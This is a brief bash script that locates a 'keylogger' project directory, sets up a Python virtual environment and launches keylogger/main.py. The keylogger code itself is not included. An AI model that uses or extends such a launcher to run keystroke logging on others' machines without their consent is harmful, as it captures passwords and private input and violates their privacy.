#!/usr/bin/env bash

keylogger_dir_name="keylogger";

if [[ ! $(pwd | grep -P $keylogger_dir_name) ]];
then
  keylogger_dir_path=$(find ~ -name $keylogger_dir_name)
  cd "$keylogger_dir_path" || { echo Not found "$keylogger_dir_path"; exit; }
fi

if [[ $(ls | grep venv) ]]
then
  . venv/bin/activate
else
  virtualenv venv
  . venv/bin/activate
  pip install -r requirements.txt
fi

python3 keylogger/main.py
